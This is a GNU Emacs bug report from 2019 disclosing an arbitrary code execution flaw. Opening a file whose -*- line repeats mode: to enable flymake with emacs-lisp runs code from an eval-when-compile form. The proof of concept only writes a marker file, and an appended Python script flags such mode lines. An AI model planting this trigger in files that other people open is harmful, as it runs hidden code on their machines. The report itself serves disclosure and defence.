From: adam plaice <plaice.adam+lists@gmail.com>
To: 37656@debbugs.gnu.org
Subject: bug#37656: 27.0.50; Opening file with specially crafted local variables can cause arbitrary code execution Inbox x
Date: Tue, 8 Oct 2019 10:48:32 +0200 [thread overview]
Message-ID: <CAJw81da4=R1jMJ0enx6SbO7G1rzaL61K2kqbY+jxhe=AM-3vtQ@mail.gmail.com> (raw)
* To reproduce:

1. Create a file, say `~/foobar', (it could have an arbitrary
extension) with the following contents:

    -*- mode: emacs-lisp; mode: flymake -*-
    (eval-when-compile
      (with-temp-file "~/emacs_flymake_security_bug"
        (insert "Could have also executed any code.")))

2. Open the file with emacs:

    emacs -Q ~/foobar

3. Inspect ~/emacs_flymake_security_bug:

    cat ~/emacs_flymake_security_bug
* Expected result

~/emacs_flymake_security_bug does not exist.

* Actual result

~/emacs_flymake_security_bug does exist.

* Further information

This relies on the "deprecated" feature of allowing `mode: ' to be
repeated more than once, to also specify minor modes. Just having:

    -*- mode: flymake -*-

in, say, `~/foobar.el' would not trigger the security bug. There may,
however, be alternative ways of triggering it that I haven't come up
with.
This was "inspired" by a very similar bug (concerning an external
package, editorconfig), described here:
https://illikainen.dev/blog/2019-10-06-editorconfig
Thank you and best regards,
Adam
In GNU Emacs 27.0.50 (build 1, x86_64-pc-linux-gnu, GTK+ Version 3.18.9)
of 2019-10-07 built on adam
Repository revision: 9839466b231b6384055b9b137405730876413cbe
Repository branch: master
Windowing system distributor 'The X.Org Foundation', version 11.0.11804000
System Description: Ubuntu 16.04.6 LTS
Recent messages:
For information about GNU Emacs and the GNU system, type C-h C-a.
Configured using:
'configure --with-modules --without-pop'
Configured features:
XPM JPEG TIFF GIF PNG RSVG SOUND GPM DBUS GSETTINGS GLIB NOTIFY INOTIFY
ACL LIBSELINUX GNUTLS LIBXML2 FREETYPE HARFBUZZ M17N_FLT LIBOTF XFT ZLIB
TOOLKIT_SCROLL_BARS GTK3 X11 XDBE XIM MODULES THREADS PDUMPER LCMS2 GMP
Important settings:
value of $LANG: en_GB.UTF-8
locale-coding-system: utf-8-unix
Major mode: Lisp Interaction
Minor modes in effect:
tooltip-mode: t
global-eldoc-mode: t
eldoc-mode: t
electric-indent-mode: t
mouse-wheel-mode: t
tool-bar-mode: t
menu-bar-mode: t
file-name-shadow-mode: t
global-font-lock-mode: t
font-lock-mode: t
blink-cursor-mode: t
auto-composition-mode: t
auto-encryption-mode: t
auto-compression-mode: t
line-number-mode: t
transient-mark-mode: t
Load-path shadows:
None found.
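As an added example (not part of the report or of Emacs itself), a small Python audit that reads a file's `-*-` line the way the report describes and flags files that repeat `mode:`, singling out the emacs-lisp plus flymake pairing; the sample file contents are constructed here, and the parser only approximates Emacs's own handling of second-line mode specs.

```python
import re
from typing import List, Tuple

# The "-*- ... -*-" local-variable spec Emacs reads from a file's first line.
MODE_LINE_RE = re.compile(r"-\*-\s*(.*?)\s*-\*-")

def parse_mode_line(line: str) -> List[Tuple[str, str]]:
    """Return the (variable, value) pairs of a -*- line, or [] if none."""
    m = MODE_LINE_RE.search(line)
    if not m:
        return []
    spec = m.group(1)
    if ":" not in spec:
        return [("mode", spec.strip())]  # bare "-*- lisp -*-" form
    pairs = []
    for item in spec.split(";"):
        key, sep, value = item.partition(":")
        if sep:
            pairs.append((key.strip(), value.strip()))
    return pairs

def modes_requested(text: str) -> List[str]:
    """Every 'mode:' value in the first two lines.  Simplification: Emacs
    consults line 2 only after a '#!' line; this scans both unconditionally."""
    modes: List[str] = []
    for line in text.splitlines()[:2]:
        modes.extend(v for k, v in parse_mode_line(line) if k == "mode")
    return modes

def audit(text: str) -> str:
    """'ok' for at most one mode, 'multiple-modes' for the deprecated repeated
    'mode:' form, 'elisp-flymake' for the exact pairing in the report."""
    modes = modes_requested(text)
    if len(modes) <= 1:
        return "ok"
    if "emacs-lisp" in modes and "flymake" in modes:
        return "elisp-flymake"
    return "multiple-modes"

# Constructed sample file contents (not real files from the reporter's system).
SAMPLES = {
    "report": "-*- mode: emacs-lisp; mode: flymake -*-\n(eval-when-compile nil)\n",
    "single": "-*- mode: flymake -*-\n",
    "lexical": ";;; demo.el --- demo -*- lexical-binding: t -*-\n",
    "shebang": "#!/bin/sh\n# -*- mode: sh; mode: flymake -*-\n",
}
```

Run `audit()` over the first few hundred bytes of each file before opening a directory of untrusted sources; anything other than "ok" deserves a look before Emacs gets to evaluate it.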